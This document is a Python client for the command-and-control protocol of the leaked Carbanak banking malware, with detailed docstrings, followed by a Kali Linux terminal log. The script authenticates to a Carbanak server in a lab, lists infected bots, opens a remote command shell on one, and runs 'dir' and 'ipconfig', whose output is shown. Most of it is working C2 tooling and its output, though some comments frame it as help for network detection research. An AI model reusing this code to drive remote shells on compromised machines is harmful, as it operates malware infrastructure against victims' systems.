Carbanak Server
import socket | |
import hashlib | |
import struct | |
import time | |
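class IdUid:
    """One bot record as decoded by ``Server.CM_GetIds``.

    ``id`` and ``idGroups`` are read as ints; ``uid``, ``info``, ``ip``,
    ``comment`` and ``ports`` are read as cp1251 strings.  Everything starts
    as ``None`` until ``CM_GetIds`` fills it in.
    """

    def __init__(self):
        # The original assigned bare locals here, so a fresh instance had none
        # of these attributes; bind them to ``self`` so they always exist.
        self.id = None
        self.uid = None
        self.info = None
        self.ip = None
        self.comment = None
        self.ports = None
        self.idGroups = None

    def __repr__(self):
        return "{}(id={!r}, uid={!r}, ip={!r}, idGroups={!r})".format(
            type(self).__name__, self.id, self.uid, self.ip, self.idGroups)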
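class StreamPipeInfo:
    """One named-pipe stream entry as decoded by ``Server.CM_GetPipeStreams``.

    ``id`` is the int stream id and ``namePipe`` the cp1251-decoded pipe name.
    """

    def __init__(self):
        # Bind to ``self``; the original assigned bare locals and left the
        # instance without these attributes until the caller set them.
        self.id = None
        self.namePipe = None

    def __repr__(self):
        return "{}(id={!r}, namePipe={!r})".format(
            type(self).__name__, self.id, self.namePipe)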
class Server:
    """Client for the control port of the leaked Carbanak server build.

    Constructing an instance is a network side effect: ``__init__`` calls
    ``Get_Connect``, which opens a TCP socket to ``HOST:PORT`` and sends the
    raw 16-byte MD5 digest of the shared password as the very first bytes on
    the connection.  Each ``CM_*`` request then begins with ``GetConnect``
    (two native-order ``int``s: bot id, command code) followed by the
    command-specific fields documented on each method.

    Encoding conventions visible in this class (useful when writing network
    detections for this traffic): ints and shorts use ``struct`` native byte
    order, strings are a ``short`` byte count followed by cp1251 bytes, and
    all ``CM_*`` calls on one instance reuse the single socket ``self.s``.
    """

    def __init__(self):
        # Command codes the server dispatches on; sent by GetConnect.
        self.CmdGetIds = 1
        self.CmdSendCmd = 2
        self.CmdJoinStream = 5
        self.CmdGetPipeStreams = 11
        self.CmdPutPipeData = 12
        # Hard-coded lab endpoint.
        self.HOST = '192.168.12.137'
        self.PORT = 800
        # Binary (not hex) MD5 of the shared secret; sent as-is by Get_Connect.
        self.PSWD_HASH = hashlib.md5("password".encode('utf-8')).digest()
        # Connects and authenticates immediately; see Get_Connect.
        self.s = self.Get_Connect()

    def putBytes(self, data, index, size):
        """Send ``data`` in full.  ``index`` and ``size`` are accepted but ignored."""
        self.s.sendall(data)

    def getInt(self):
        """Read one native-order 4-byte int.

        NOTE: ``recv(4)`` may legally return fewer than 4 bytes; then
        ``struct.unpack`` raises ``struct.error`` and nothing is re-read.
        """
        return struct.unpack('i', self.s.recv(4))[0]

    def putInt(self, data):
        """Send ``data`` as one native-order 4-byte int."""
        self.s.sendall(struct.pack('i', data))

    def getShort(self):
        """Read one native-order 2-byte short (same short-read caveat as ``getInt``)."""
        return struct.unpack('h', self.s.recv(2))[0]

    def putShort(self, data):
        """Send ``data`` as one native-order 2-byte short."""
        self.s.sendall(struct.pack('h', data))

    def getString(self):
        """Read a length-prefixed string: ``short`` byte count, then cp1251 bytes.

        ``len`` shadows the builtin here (kept as-is).  As with ``getInt``,
        a short ``recv`` makes ``struct.unpack`` raise rather than re-reading.
        """
        len = self.getShort()
        byte_string = struct.unpack(str(len)+'s', self.s.recv(len))[0]
        return byte_string.decode("1251")

    def putString(self, data):
        """Send ``data`` as a ``short`` count followed by its cp1251 encoding.

        The count is ``len(data)`` in characters; cp1251 is a single-byte
        code page, so this equals the encoded byte length for any text that
        encodes at all (characters outside cp1251 raise ``UnicodeEncodeError``).
        """
        self.putShort(len(data))
        self.s.sendall(bytearray(data, "1251"))

    # Called from __init__: every Server() is a fresh, pre-authenticated connection.
    def Get_Connect(self):
        """Open the TCP connection and send the 16-byte password digest.

        Returns the connected socket; nothing is read back, so a rejected
        password is not detected here.
        """
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.HOST, self.PORT))
        s.sendall(self.PSWD_HASH)
        return s

    def GetConnect(self, id, cmd):
        """Send the request header: bot ``id`` and command ``cmd`` as two native ints."""
        data = struct.pack('ii', id, cmd)
        self.s.sendall(data)

    def CM_GetIds(self):
        """Request the bot list (command 1) and return it as ``IdUid`` records.

        Reply layout: ``int`` count, then per record ``int`` id, strings uid,
        info, ip, comment, ports, and ``int`` idGroups.  Only the first
        record is consumed: the ``if count > 0`` branch runs once, so when the
        server reports more than one bot the remaining records stay unread on
        the socket and any later read on this connection is misaligned.
        Every decoded field is echoed to stdout.
        """
        ret = []
        self.GetConnect(0, self.CmdGetIds)
        count = self.getInt()
        print('count', count)
        if count > 0:
            iu = IdUid()
            id = self.getInt()
            print('id', id)
            iu.id = id
            uid = self.getString()
            print('uid', uid)
            iu.uid = uid
            info = self.getString()
            print('info', info)
            iu.info = info
            ip = self.getString()
            print('ip', ip)
            iu.ip = ip
            comment = self.getString()
            print('comment', comment)
            iu.comment = comment
            ports = self.getString()
            print('ports', ports)
            iu.ports = ports
            idGroups = self.getInt()
            print('idGroups', idGroups)
            iu.idGroups = idGroups
            ret.append(iu)
        return ret

    def CM_SendCmd(self, id, uid, cmd):
        """Send command 2 for bot ``id`` with the string ``cmd``.

        ``uid`` is accepted but never transmitted.  No reply is read.
        """
        self.GetConnect(id, self.CmdSendCmd)
        self.putString(cmd)

    def CM_GetStream(self, id, uid, idStream):
        """Send command 5 with ``idStream`` and return the raw socket.

        After this call the connection carries the joined stream; the caller
        reads it directly (see ``CmdOutputer``).  ``uid`` is not transmitted.
        """
        self.GetConnect(id, self.CmdJoinStream)
        self.putInt(idStream)
        return self.s

    def CM_GetPipeStreams(self, id, uid, nameId):
        """Send command 11 with the string ``nameId`` and decode the pipe list.

        Reply layout: ``short`` count, then per entry ``int`` stream id and a
        string pipe name.  Both are echoed with ``repr`` to stdout.  ``uid``
        is not transmitted.
        """
        self.GetConnect(id, self.CmdGetPipeStreams)
        self.putString(nameId)
        count = self.getShort()
        ret = [None] * count
        for i in range(count):
            idStream = self.getInt()
            namePipe = self.getString()
            print(repr(idStream))
            print(repr(namePipe))
            ret[i] = StreamPipeInfo()
            ret[i].id = idStream;
            ret[i].namePipe = namePipe;
        return ret

    def CM_PutPipeData(self, id, uid, namePipe, data, count):
        """Send command 12: string ``namePipe``, ``int`` count, then ``data`` raw.

        ``putBytes`` sends the whole of ``data`` regardless of ``count``, so
        the two must already agree.  Always returns ``True``; no reply is read.
        """
        self.GetConnect(id, self.CmdPutPipeData)
        self.putString(namePipe)
        self.putInt(count)
        self.putBytes(data, 0, count)
        return True
def StarterCmd(ids: 'list[IdUid]') -> 'tuple[list[StreamPipeInfo], socket.socket]':
    """Start the "cmd" stream on the first bot in ``ids`` and join it.

    Three separate ``Server()`` instances are created, so this opens three
    authenticated TCP connections; only the third (the joined stream socket)
    is returned, and none of them is closed here.  Raises ``IndexError`` if
    ``ids`` or the returned pipe list is empty.
    """
    Server().CM_SendCmd(ids[0].id, ids[0].uid, "cmd")
    # Fixed wait for the pipe to appear; there is no readiness check.
    time.sleep(10)
    pipes = Server().CM_GetPipeStreams(ids[0].id, ids[0].uid, "cmd")
    jS = Server().CM_GetStream(ids[0].id, ids[0].uid, pipes[0].id) # joined Stream Socket
    return pipes, jS
def SendInput(user_cmd: str, id: int, uid: str, pipeId: int, namePipe: str) -> None:
    """Wrap one console line in a pipe-data frame and send it via command 12.

    Frame layout as built below: 2 header bytes, the 48-byte ``msg`` struct,
    the cp866 command bytes, ``I`` 55, ``I`` pipeId, ``H`` 0.  Note how the
    header is produced: ``pack_into("i", ..., 0)`` writes 4 bytes but the
    offset advances by only 1, the second ``pack_into`` at offset 1 does the
    same, and the ``msg`` copy starting at offset 2 overwrites everything
    after byte 1.  On a little-endian host the surviving header is therefore
    byte 0 = ``msg_pack.size & 0xff`` and byte 1 = ``sz_data & 0xff`` — two
    one-byte fields, which matches the ``2 +`` budget in ``sz``.  A command
    longer than 255 bytes would have its length truncated in that byte.
    A fresh ``Server()`` (new connection) is opened for every call.
    """
    user_cmd = user_cmd+"\r\n"
    # Character count; cp866 is single-byte, so equal to the encoded length
    # for any text that encodes at all.
    sz_data = len(user_cmd)
    # cmd (UInt32), answer (byte * 32), func (UInt32), tag (UInt32), sz_data (Int32)
    msg_pack = struct.Struct("I32sIIi")
    msg = msg_pack.pack(1, bytearray('\x00' * 32, 'utf-8'), 0, 0, sz_data)
    user_data = bytearray(user_cmd, "866") # old school USSR 866 encoding
    sz = 2 + msg_pack.size + sz_data + 4 + 4 + 2
    data = bytearray(sz)
    i = 0
    struct.pack_into("i", data, i, msg_pack.size)
    i += 1  # advances 1, not 4: see docstring
    struct.pack_into("i", data, i, sz_data)
    i += 1  # likewise; bytes 2.. are overwritten by msg next
    data[i:i+msg_pack.size] = msg
    i += msg_pack.size
    data[i:i+sz_data] = user_data
    i += sz_data
    # Trailer: constant 55, the pipe id, and a zero short.  Meaning of 55 is
    # not established by this file.
    struct.pack_into("I", data, i, 55)
    i += 4
    struct.pack_into("I", data, i, pipeId)
    i += 4
    struct.pack_into("H", data, i, 0)
    i += 2
    Server().CM_PutPipeData(id, uid, namePipe, data, sz)
# Read from the joined stream socket returned by StarterCmd / CM_GetStream.
def CmdOutputer(jS: 'socket.socket') -> None:
    """Wait, then print whatever one ``recv`` yields from the joined stream.

    A single ``recv(2048)`` is used: output longer than that (or arriving
    later) is left on the socket for the next call, and an empty read
    (peer closed) just prints an empty line.  Bytes are decoded as cp866.
    """
    # Fixed wait for output to accumulate; no readiness check.
    time.sleep(10)
    # read output from socket
    out = jS.recv(2048)
    out = out.decode("866")
    print(out)
# Driver: take the first bot the server lists, start its "cmd" stream, and
# send two console commands, printing what streams back.  Every Server()
# constructed here and inside StarterCmd/SendInput opens and authenticates
# its own TCP connection; none is closed explicitly.
ids = Server().CM_GetIds()
# IndexError here (inside StarterCmd) if the server reports zero bots.
pipes, jS = StarterCmd(ids)
SendInput("dir", ids[0].id, ids[0].uid, pipes[0].id, pipes[0].namePipe)
CmdOutputer(jS)
# Fixed pause between commands, like the sleeps in StarterCmd/CmdOutputer.
time.sleep(10)
SendInput("ipconfig", ids[0].id, ids[0].uid, pipes[0].id, pipes[0].namePipe)
CmdOutputer(jS)
root@kali:~/carbanak_rpc# python3 server.py | |
count 1 | |
id 1 | |
uid example0c3d2682004a49022 | |
info OS: Win7SP1.x64, Domain: WIN-GS0JF9KMEJ2, User: ecks, Ver: 1.3 | |
ip 192.168.12.136 | |
comment | |
ports | |
idGroups 0 | |
1 | |
'GCZScvcfzUbGNcYDj' | |
║ Microsoft Windows [Version 6.1.7601] | |
Copyright (c) 2009 Microsoft Corporation. All rights reserved. | |
C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ?????>C═ dir | |
Volume in drive C has no label. | |
Volume Serial Number is 4CBF-78E0 | |
Directory of C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ????? | |
08/15/2019 07:18 AM <DIR> . | |
08/15/2019 07:18 AM <DIR> .. | |
07/22/2019 10:01 PM 147,456 bot.dll | |
07/22/2019 10:01 PM 150,528 bot.exe | |
07/22/2019 10:01 PM 100,352 botcmd.exe | |
07/22/2019 10:01 PM 6,773 bot_cmd.txt | |
08/15/2019 07:18 AM 150,528 bot_out.exe | |
07/22/2019 10:01 PM 155,136 bot_x64.dll | |
07/22/2019 10:01 PM 155,136 bot_x64.exe | |
07/22/2019 10:01 PM 88,576 builder.exe | |
07/22/2019 10:01 PM 6 builder_gui.config | |
07/22/2019 10:01 PM 3,507,712 builder_gui.exe | |
07/22/2019 10:01 PM 142,336 CmdManager.exe | |
07/22/2019 10:01 PM 98 CmdManager.xml | |
07/22/2019 10:01 PM 184 config_server.xml | |
08/15/2019 07:17 AM 1,076 example.config | |
07/22/2019 10:01 PM 74,752 Player.dll | |
07/22/2019 10:01 PM 6,656 PlayerExe.exe | |
08/15/2019 07:18 AM 308 private.key | |
08/15/2019 07:18 AM 84 public.key | |
08/15/2019 07:18 AM 348 public_key.txt | |
07/22/2019 10:01 PM 153,600 Server.exe | |
07/22/2019 10:01 PM 147,968 VncSharp.dll | |
07/22/2019 10:01 PM <DIR> _plugins | |
21 File(s) 4,989,613 bytes | |
3 Dir(s) 37,535,412,224 bytes free | |
C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ?????> | |
ipconfig | |
Г╚ | |
Windows IP Configuration | |
Ethernet adapter Bluetooth Network Connection: | |
Media State . . . . . . . . . . . : Media disconnected | |
Connection-specific DNS Suffix . : | |
Ethernet adapter Local Area Connection: | |
Connection-specific DNS Suffix . : localdomain | |
Link-local IPv6 Address . . . . . : fe80::f506:2f75:c598:7843%11 | |
IPv4 Address. . . . . . . . . . . : 192.168.12.136 | |
Subnet Mask . . . . . . . . . . . : 255.255.255.0 | |
Default Gateway . . . . . . . . . : | |
Tunnel adapter isatap.{9B02B57E-595C-4236-9E7C-08CE5E649765}: | |
Media State . . . . . . . . . . . : Media disconnected | |
Connection-specific DNS Suffix . : | |
Tunnel adapter isatap.localdomain: | |
Media State . . . . . . . . . . . : Media disconnected | |
Connection-specific DNS Suffix . : localdomain | |
C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ?????> |